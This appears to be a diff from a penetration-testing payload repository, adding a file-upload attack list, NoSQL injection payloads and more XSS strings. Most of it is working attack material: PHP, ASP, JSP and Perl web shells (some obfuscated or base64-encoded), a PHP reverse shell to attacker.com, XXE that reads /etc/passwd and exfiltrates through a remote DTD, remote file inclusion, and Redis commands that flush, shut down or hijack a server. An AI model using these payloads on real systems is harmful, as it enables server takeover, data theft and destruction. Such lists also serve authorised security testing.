# ============================
# MAGIC BYTES (File Signatures)
# ============================
# PHP Web Shell with JPEG Header
FF D8 FF E0 (JPEG magic bytes)
<?php system($_GET['cmd']); ?>
# PHP Web Shell with PNG Header
89 50 4E 47 0D 0A 1A 0A (PNG magic bytes)
<?php system($_GET['cmd']); ?>
# PHP Web Shell with GIF Header
GIF89a
<?php system($_GET['cmd']); ?>
# PHP Web Shell with PDF Header
%PDF-1.4
<?php system($_GET['cmd']); ?>
# PHP Web Shell with ZIP Header
PK (ZIP magic bytes)
<?php system($_GET['cmd']); ?>
# ============================
# POLYGLOT FILES (Valid Image + Valid Code)
# ============================
# GIF + PHP Polyglot
GIF89a<?php system($_GET['cmd']); ?>
# JPEG + PHP Polyglot (with comment)
# Add PHP code in JPEG comment section
# Use exiftool: exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# PNG + PHP Polyglot
# Use PNG ancillary chunks to hide PHP code
# BMP + PHP Polyglot
# BMP header followed by PHP code in pixel data
# ============================
# WEB SHELL PAYLOADS
# ============================
# === PHP Web Shells ===
# Simple PHP Shell
<?php system($_GET['cmd']); ?>
# PHP Shell with POST
<?php system($_POST['cmd']); ?>
# PHP Eval Shell
<?php eval($_REQUEST['cmd']); ?>
# PHP Passthru Shell
<?php passthru($_GET['cmd']); ?>
# PHP Exec Shell
<?php echo exec($_GET['cmd']); ?>
# PHP Shell_exec
<?php echo shell_exec($_GET['cmd']); ?>
# PHP Backdoor
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
# PHP File Manager Shell
<?php
if(isset($_GET['file'])){
echo file_get_contents($_GET['file']);
}
if(isset($_FILES['upload'])){
move_uploaded_file($_FILES['upload']['tmp_name'], $_FILES['upload']['name']);
}
?>
# PHP One-liner Shells
<?=`$_GET[x]`?>
<?=system($_GET[x]);?>
<?=shell_exec($_GET[x]);?>
<?=passthru($_GET[x]);?>
<?=exec($_GET[x]);?>
# Obfuscated PHP Shell
<?php $a=$_GET['a'];$b=$_GET['b'];$a($b);?>
<?php @eval($_POST['x']);?>
<?php @assert($_POST['x']);?>
<?php $f='sys'.'tem';$f($_GET['x']);?>
# PHP Reverse Shell
<?php
$sock=fsockopen("attacker.com",4444);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
# === ASP/ASPX Web Shells ===
# ASP Shell
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Response.Write(oScript.Exec("cmd /c " & Request.QueryString("cmd")).StdOut.ReadAll())
%>
# ASPX Shell
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e){
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + Request.QueryString["cmd"];
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.UseShellExecute = false;
p.Start();
Response.Write(p.StandardOutput.ReadToEnd());
}
</script>
# ASPX One-liner
<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
# === JSP Web Shells ===
# JSP Shell
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
int i;
while((i = in.read()) != -1) {
out.print((char)i);
}
%>
# JSP One-liner
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
# === Python Web Shell ===
#!/usr/bin/env python
import os
import cgi
form = cgi.FieldStorage()
cmd = form.getvalue('cmd')
os.system(cmd)
# === Perl Web Shell ===
#!/usr/bin/perl
use CGI;
$q = CGI->new;
print $q->header;
print `$q->param('cmd')`;
# ============================
# XSS VIA FILE UPLOAD
# ============================
# HTML File Upload
<html>
<body>
<script>alert(document.cookie)</script>
</body>
</html>
# SVG File Upload with XSS
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
# SVG with XSS (onload)
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
# PDF with XSS (if rendered in browser)
%PDF-1.4
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction << /S /JavaScript /JS (app.alert('XSS');) >>
>>
endobj
# XML with XSS
<?xml version="1.0"?>
<!DOCTYPE html [
<!ENTITY js "alert(document.domain)">
]>
<html>
<body>
<script>&js;</script>
</body>
</html>
# ============================
# XXE VIA FILE UPLOAD
# ============================
# SVG with XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
# XML with XXE
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
# XXE - Parameter Entity
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<foo>&exfil;</foo>
# XXE - Blind OOB
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker.com/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
# ============================
# PATH TRAVERSAL IN FILENAME
# ============================
# Directory Traversal
../../../etc/passwd
..\..\..\..\windows\system32\config\sam
....//....//....//etc/passwd
# Overwrite Important Files
../../../var/www/html/index.php
../../../.ssh/authorized_keys
../../config.php
../../../.htaccess
../../wp-config.php
# Filename with Path Traversal
../../../../tmp/shell.php
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
# ============================
# HTACCESS FILE UPLOAD
# ============================
# .htaccess to Execute PHP
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .gif
# .htaccess to Execute All Files as PHP
AddType application/x-httpd-php .
SetHandler application/x-httpd-php
# .htaccess to Bypass Upload Restrictions
<FilesMatch "\.ph(p|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
# ============================
# WEB.CONFIG FILE UPLOAD (IIS)
# ============================
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers>
<add name="PHP_via_FastCGI"
path="*.jpg"
verb="*"
modules="FastCgiModule"
scriptProcessor="C:\PHP\php-cgi.exe"
resourceType="Unspecified" />
</handlers>
</system.webServer>
</configuration>
# ============================
# ARCHIVE-BASED ATTACKS
# ============================
# ZIP Slip - Malicious Archive
# Create zip file with: ../../../../var/www/html/shell.php
# ZIP with Symlink
# ln -s /etc/passwd passwd.txt
# zip --symlinks payload.zip passwd.txt
# TAR with Path Traversal
# tar -cf payload.tar ../../../../var/www/html/shell.php
# Zip Bomb (DoS)
# Create highly compressed file that expands to huge size
# ============================
# IMAGE METADATA INJECTION
# ============================
# EXIF Data with XSS (if displayed)
exiftool -Comment='<script>alert(1)</script>' image.jpg
# EXIF Data with PHP Code
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# IPTC Data Injection
exiftool -IPTC:Caption-Abstract='<?php eval($_POST["x"]); ?>' image.jpg
# ============================
# SERVER-SPECIFIC BYPASSES
# ============================
# Apache
shell.php.jpg (with .htaccess: AddType application/x-httpd-php .jpg)
.htaccess file to execute images as PHP
# IIS
shell.asp;.jpg
shell.asp:.jpg
web.config to execute images as ASP
# Nginx
shell.php%00.jpg (older versions)
Upload to misconfigured alias/location
# Tomcat
shell.jsp%00.jpg
shell.jspx
# ============================
# RACE CONDITION FILE UPLOAD
# ============================
# RACE CONDITION FILE UPLOAD
# ============================
# Upload file quickly and access before validation/deletion
# Technique: Concurrent upload and access requests
# Example: Upload shell.php and immediately request http://target.com/uploads/shell.php
# Use tools like Burp Suite Turbo Intruder or custom scripts to send simultaneous requests
# ============================
# FILE UPLOAD WITH SIZE BYPASS
# ============================
# Small malicious file
<?=`$_GET[0]`?>
# Compressed PHP shell
<?=`{$_GET[0]}`;
# ============================
# MIME TYPE CONFUSION
# ============================
# Upload with different MIME types
Content-Type: application/x-php
Content-Type: application/x-httpd-php
Content-Type: application/php
Content-Type: text/php
Content-Type: text/x-php
# ============================
# POLYGLOT FILES FOR MULTIPLE FORMATS
# ============================
# JPEG + JAR Polyglot (for Java apps)
# Valid JPEG and valid JAR simultaneously
# PDF + HTML Polyglot
%PDF-1.4
<html><script>alert(1)</script></html>
# GIF + JavaScript
GIF89a/*<?php
<script>alert(1)</script>
<?php */;
# ============================
# MODERN BYPASS TECHNIQUES (2023-2025)
# ============================
# Unicode Normalization
shell.php%E2%80%AE.jpg (Right-to-Left Override)
shellgpj.php (RLO character)
# Homoglyph Attacks
shell.рhр (Cyrillic р instead of Latin p)
shell.рhр
# UTF-8 BOM
<?php system($_GET['cmd']); ?>
# Long Filename DoS
# Create extremely long filename to bypass validation
# Multiple Content-Disposition
Content-Disposition: form-data; name="file"; filename="safe.jpg"
Content-Disposition: form-data; name="file"; filename="shell.php"
# Null Session (Windows)
\\127.0.0.1\c$\inetpub\wwwroot\shell.php
# Case Sensitivity Issues
ShElL.PhP
SHELL.php
Shell.PHP
# ============================
# FRAMEWORK-SPECIFIC BYPASSES
# ============================
# WordPress
wp-content/uploads/shell.php
wp-content/themes/shell.php
wp-content/plugins/shell.php
# Drupal
sites/default/files/shell.php
# Joomla
media/shell.php
images/shell.php
# Laravel
storage/app/shell.php
public/uploads/shell.php
# Django
media/uploads/shell.py
# ============================
# REMOTE FILE INCLUSION VIA UPLOAD
# ============================
# Upload file containing:
<?php include($_GET['file']); ?>
<?php require($_GET['file']); ?>
<?php include_once($_GET['file']); ?>
# Then access with:
?file=http://attacker.com/shell.txt
?file=php://input (with POST data containing PHP code)
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
# ============================
# FILE UPLOAD WITH SSRF
# ============================
# Upload file that triggers SSRF
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="http://internal-server/admin"/>
</svg>
# ============================
# DESERIALIZATION VIA FILE UPLOAD
# ============================
# PHP Phar Deserialization
# Upload malicious .phar file
# Trigger via: file_get_contents('phar://uploads/payload.phar/test.txt')
# Java Deserialization
# Upload serialized Java object
# Trigger if application deserializes uploaded files
# ============================
# EICAR TEST FILE (AV Bypass Testing)
# ============================
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
# ============================
# BINARY PAYLOAD ENCODINGS
# ============================
# Base64 Encoded Shell
<?php eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7")); ?>
# Hex Encoded
<?php eval(hex2bin("73797374656d28245f4745545b27636d64275d293b")); ?>
# ROT13
<?php eval(str_rot13("flfgrz($_TRG['pzq']);")); ?>
# ============================
# ALTERNATIVE DATA STREAMS (Windows/NTFS)
# ============================
shell.php::$DATA
shell.asp::$DATA
payload.txt:hidden.php
NoSQL-Injection/README.md
+38
View File
@@ -0,0 +1,38 @@
# NoSQL Injection
## Description
NoSQL injection is a vulnerability where an attacker can inject or manipulate NoSQL queries to bypass authentication, extract data, or perform unauthorized operations. This affects databases like MongoDB, CouchDB, Redis, Cassandra, and others that don't use traditional SQL syntax.
## Common Attack Vectors
- Authentication bypass in login forms
- Data extraction through query manipulation
- MongoDB operator injection ($ne, $gt, $regex, etc.)
- JSON/BSON injection in APIs
- Redis command injection
- CouchDB view manipulation
- Elasticsearch query injection
## Testing Approach
Submit NoSQL operators, special characters, and query manipulation attempts in:
- Login forms (username/password fields)
- Search parameters
- API endpoints accepting JSON
- Query string parameters
- Cookie values
- HTTP headers
## Common Vulnerable Patterns
- Direct user input in `find()`, `findOne()` queries
- Unvalidated JSON parsing in authentication
- Improper input sanitization in MongoDB queries
- Exposed NoSQL query interfaces
## Payloads
See `nosql-injection-payloads.txt` for a comprehensive list of NoSQL injection payloads covering:
- MongoDB injection
- CouchDB injection
- Redis injection
- Cassandra injection
- Elasticsearch injection
- Authentication bypass techniques
- Data extraction methods
NoSQL-Injection/nosql-injection-payloads.txt
+323
View File
@@ -0,0 +1,323 @@
# NoSQL Injection Payloads (2020-2025 Bug Bounty Tested)
# ============================
# MongoDB Injection Payloads
# ============================
# Authentication Bypass - JSON Format
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"username": "admin", "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$in": ["admin", "administrator", "root"]}, "password": {"$ne": ""}}
# Authentication Bypass - URL Encoded
username[$ne]=null&password[$ne]=null
username[$ne]=&password[$ne]=
username[$gt]=&password[$gt]=
username[$regex]=.*&password[$regex]=.*
username=admin&password[$ne]=
username=admin&password[$gt]=
username[$nin][]=&password[$ne]=
username[$exists]=true&password[$exists]=true
# MongoDB Operators Injection
{"$where": "sleep(5000)"}
{"$where": "this.password == 'admin'"}
{"username": {"$regex": "^admin"}}
{"username": {"$regex": "admin.*"}}
{"email": {"$regex": ".*@domain\\.com$"}}
{"role": {"$in": ["admin", "superuser"]}}
{"age": {"$gt": 0}}
{"price": {"$lt": 9999}}
{"status": {"$ne": "inactive"}}
{"verified": {"$eq": true}}
# Time-Based NoSQL Injection (MongoDB)
{"$where": "sleep(5000) || true"}
{"username": {"$regex": "^a"}, "$where": "sleep(5000)"}
';sleep(5000);'
';return true;var x='
{"username": "admin", "$where": "sleep(5000)"}
# Data Extraction - MongoDB
{"username": {"$regex": "^a"}}
{"username": {"$regex": "^ad"}}
{"username": {"$regex": "^adm"}}
{"username": {"$regex": "^admi"}}
{"username": {"$regex": "^admin"}}
{"password": {"$regex": "^[a-z]"}}
{"apiKey": {"$regex": "^.*"}}
# Boolean-Based MongoDB Injection
{"username": "admin", "password": {"$ne": "wrong"}}
{"$or": [{"username": "admin"}, {"email": "admin@test.com"}]}
{"$and": [{"username": {"$exists": true}}, {"password": {"$exists": true}}]}
{"$nor": [{"banned": true}, {"deleted": true}]}
# MongoDB Command Injection
{"username": "admin", "$comment": "test"}
{"username": "admin", "$hint": "username_1"}
{"$orderby": {"username": 1}}
{"username": {"$type": 2}}
{"username": {"$size": 5}}
# MongoDB Operator Abuse
{"username": {"$all": ["admin"]}}
{"roles": {"$elemMatch": {"role": "admin"}}}
{"metadata": {"$exists": false}}
{"settings": {"$nin": ["disabled"]}}
# Advanced MongoDB Injection (2023-2025)
{"username": {"$expr": {"$eq": ["$username", "admin"]}}}
{"$expr": {"$gt": [{"$strLenCP": "$password"}, 0]}}
{"username": {"$jsonSchema": {}}}
{"username": "admin'; return true; var a='"}
{"username": "admin\"; return true; var a=\""}
# ============================
# CouchDB Injection Payloads
# ============================
# CouchDB View Manipulation
startkey="admin"&endkey="admin\ufff0"
startkey=["admin"]&endkey=["admin", {}]
key="admin"
keys=["admin","root","administrator"]
# CouchDB Query Injection
{"selector": {"username": {"$eq": "admin"}}}
{"selector": {"$or": [{"username": "admin"}, {"role": "admin"}]}}
{"selector": {"password": {"$gt": null}}}
{"selector": {"_id": {"$gte": null}}}
# CouchDB Mango Query Injection
{"selector": {"$and": [{"username": {"$exists": true}}, {"password": {"$exists": true}}]}}
{"selector": {"username": {"$regex": "(?i)admin"}}}
{"selector": {"email": {"$regex": ".*@.*"}}}
# ============================
# Redis Injection Payloads
# ============================
# Redis Command Injection
\n\r\nSET key value\r\n
\n\r\nFLUSHALL\r\n
\n\r\nGET password\r\n
\n\r\nKEYS *\r\n
\n\r\nCONFIG GET *\r\n
\n\r\nCONFIG SET dir /var/www/html\r\n
\n\r\nSAVE\r\n
\n\r\nSHUTDOWN\r\n
\n\r\nSLAVEOF attacker.com 6379\r\n
# Redis Protocol Injection
*1\r\n$8\r\nFLUSHALL\r\n
*1\r\n$4\r\nKEYS\r\n$1\r\n*\r\n
*2\r\n$3\r\nGET\r\n$3\r\nkey\r\n
*3\r\n$3\r\nSET\r\n$4\r\ntest\r\n$5\r\nvalue\r\n
# Redis Lua Injection
EVAL "return redis.call('GET', 'password')" 0
EVAL "return redis.call('KEYS', '*')" 0
EVAL "redis.call('SET', 'hacked', 'true')" 0
# ============================
# Cassandra Injection Payloads
# ============================
# Cassandra CQL Injection
' OR '1'='1
admin' --
admin' /*
' ALLOW FILTERING --
' AND token(id) > token(' union select * from users --')
# ============================
# Elasticsearch Injection
# ============================
# Elasticsearch Query Injection
{"query": {"match_all": {}}}
{"query": {"wildcard": {"username": "*"}}}
{"query": {"regexp": {"password": ".*"}}}
{"query": {"prefix": {"apikey": ""}}}
{"query": {"bool": {"must_not": {"term": {"role": "guest"}}}}}
# Elasticsearch Script Injection (Groovy/Painless)
{"script": {"source": "doc['password'].value"}}
{"query": {"script_score": {"query": {"match_all": {}}, "script": {"source": "Math.random()"}}}}
# Elasticsearch Aggregation Injection
{"aggs": {"passwords": {"terms": {"field": "password", "size": 1000}}}}
{"aggs": {"users": {"terms": {"field": "username.keyword"}}}}
# ============================
# Generic NoSQL Injection
# ============================
# Array Injection
username[]=admin&password[]=password
username[$gt]=&password[$gt]=
{"username": ["$ne", null], "password": ["$ne", null]}
# Type Confusion
username=admin&password=true
username=admin&password=1
{"username": "admin", "password": true}
{"username": "admin", "password": 1}
# Null Byte Injection
admin%00
admin\x00
{"username": "admin\u0000"}
# Comment Injection
admin' // comment
admin' /* comment */
{"username": "admin' // ", "password": "pass"}
# Encoding Bypasses
{"username": {"$ne": "\u0000"}}
{"username": {"$regex": "\x2e\x2a"}}
# ============================
# Authentication Bypass Combinations (High Success Rate 2020-2025)
# ============================
# JSON POST Body
{"username": "admin", "password": {"$ne": null}}
{"username": {"$in": ["admin", "administrator"]}, "password": {"$exists": true}}
{"$or": [{"username": "admin"}, {"username": "administrator"}], "password": {"$gt": ""}}
{"username": "admin", "password": {"$regex": "^.*"}}
# URL Parameters
?username[$ne]=fake&password[$ne]=fake
?username=admin&password[$gt]=
?username[$regex]=admin&password[$ne]=fake
?username[$in][]=admin&password[$exists]=true
# Cookie Values
username=admin; password[$ne]=fake
session={"username":{"$ne":null},"password":{"$ne":null}}
# HTTP Headers
X-Username: admin
X-Password: {"$ne": ""}
Authorization: {"username": {"$ne": null}}
# ============================
# Advanced Data Extraction Techniques
# ============================
# Character-by-Character Extraction
{"username": {"$regex": "^a.*"}}
{"username": {"$regex": "^ad.*"}}
{"username": {"$regex": "^adm.*"}}
# Length-Based Extraction
{"password": {"$regex": "^.{8}$"}}
{"password": {"$regex": "^.{1,100}$"}}
# Character Set Testing
{"password": {"$regex": "^[a-z].*"}}
{"password": {"$regex": "^[A-Z].*"}}
{"password": {"$regex": "^[0-9].*"}}
# ============================
# Blind NoSQL Injection
# ============================
# Time-Based
{"$where": "sleep(5000)"}
{"$where": "this.username == 'admin' && sleep(5000)"}
{"username": "admin", "$where": "sleep(5000) || true"}
# Boolean-Based
{"username": "admin", "password": {"$regex": "^a"}}
{"username": "admin", "password": {"$regex": "^b"}}
# ============================
# NoSQL Injection Payloads for APIs
# ============================
# GraphQL-style NoSQL Injection
{"filter": {"username": {"$ne": null}}}
{"where": {"password": {"$exists": true}}}
{"match": {"role": "admin"}}
# REST API Query Parameters
?filter[username][$ne]=fake
?where[password][$exists]=true
?sort[role][$eq]=admin
# ============================
# Polyglot NoSQL Injection
# ============================
' || '1'=='1' || {"$ne":""}
admin' || true || {"$ne": null}
{"$ne": null} || '1'='1
# ============================
# Denial of Service (DoS) Payloads
# ============================
{"$where": "while(true){}"}
{"$where": "for(var i=0;i<99999999;i++){}"}
{"username": {"$regex": "^((((((((((a+)+)+)+)+)+)+)+)+)+)$"}}
# ============================
# Modern Framework-Specific Injections (2023-2025)
# ============================
# Express.js/Node.js
req.body.username[$ne]=null
req.query.password[$gt]=
req.cookies.user[$exists]=true
# Django MongoDB
{"username__ne": null, "password__ne": null}
{"username__regex": "admin"}
{"password__exists": True}
# PHP MongoDB
array("username" => array('$ne' => null))
array("password" => array('$gt' => ""))
# Python (PyMongo)
{"username": {"$ne": None}, "password": {"$ne": None}}
{"username": {"$regex": ".*admin.*", "$options": "i"}}
# ============================
# WAF/Filter Bypass Techniques
# ============================
# Unicode Bypass
{"username": {"$\u006Ee": null}}
{"username": {"\u0024ne": null}}
# Case Variation
{"username": {"$Ne": null}}
{"username": {"$NE": null}}
# Spacing/Formatting
{"username":{"$ne":null}}
{ "username" : { "$ne" : null } }
{"username" : {"$ne" : null}}
# Property Pollution
{"__proto__": {"admin": true}}
{"constructor": {"prototype": {"admin": true}}}
# ============================
# Server-Side JavaScript Injection (SSJI)
# ============================
'; return true; var dummy='
"; return true; var dummy="
'; var ret = this; return ret; var dummy='
{"$where": "function() { return true; }"}
{"$where": "obj.credits - obj.price > 0"}
README.md
+4 -1
View File
@@ -9,8 +9,10 @@ This repository contains a complete collection of testing payloads organized by
**Injection Vulnerabilities:**
- **[SQL Injection](./SQL-Injection/)** - Database query manipulation
- **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB)
- **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection
- **[Command Injection](./Command-Injection/)** - OS command execution
- **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks
- **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets
- **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation
- **[Log Injection](./Log-Injection/)** - Log file manipulation
- **[XML Injection](./XML-Injection/)** - XML and XXE attacks
@@ -28,6 +30,7 @@ This repository contains a complete collection of testing payloads organized by
**Server-Side Vulnerabilities:**
- **[SSRF](./SSRF/)** - Server-side request forgery
- **[Deserialization](./Deserialization/)** - Insecure deserialization
- **[File Upload](./File-Upload/)** - Malicious file upload & RCE techniques
**Configuration & Design:**
- **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations
XSS/xss-payloads.txt
+21
View File
@@ -3,14 +3,29 @@
# Basic XSS
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(123)</script>
<script>alert("XSS")</script>
<script>alert("XSS");</script>
<script>alert("hellox worldss");</script>
<script>alert(/XSS")</script>
<script>alert(/XSS/)</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>alert(window.origin)</script>
# Inline JavaScript XSS
'; alert(1);
')alert(1);//
# IMG tag XSS
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(1)>
<img src=javascript:alert('XSS')>
<img src="javascript:alert('XSS')">
<img src=""javascript:alert('XSS');"">
<img src="javascript:alert(&quot;XSS&quot;)">
<img src="jAVasCrIPt:alert('XSS')">
<img src="xss" onerror="alert(1)">
<img src="x" onerror="alert(String.fromCharCode(88,83,83))">
<img/src="x"/onerror=alert(1)>
@@ -44,6 +59,7 @@
# JavaScript protocol
<a href="javascript:alert('XSS')">click</a>
<iframe src="javascript:alert('XSS')">
<iframe 00="" src="&Tab;javascript:prompt(1)&Tab;">
<object data="javascript:alert('XSS')">
# DOM-based XSS
@@ -66,12 +82,17 @@ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</
# Attribute-based XSS
"><script>alert(1)</script>
"><script>alert("XSS")</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
'><img src=x onerror=alert(1)>
"&gt;<script>alert("XSS")</script>
# Template injection XSS
{{alert(1)}}
${alert(1)}
<%= alert(1) %>
{alert(1)}
# SVG/HTML nesting XSS
<svg></svg></iframe>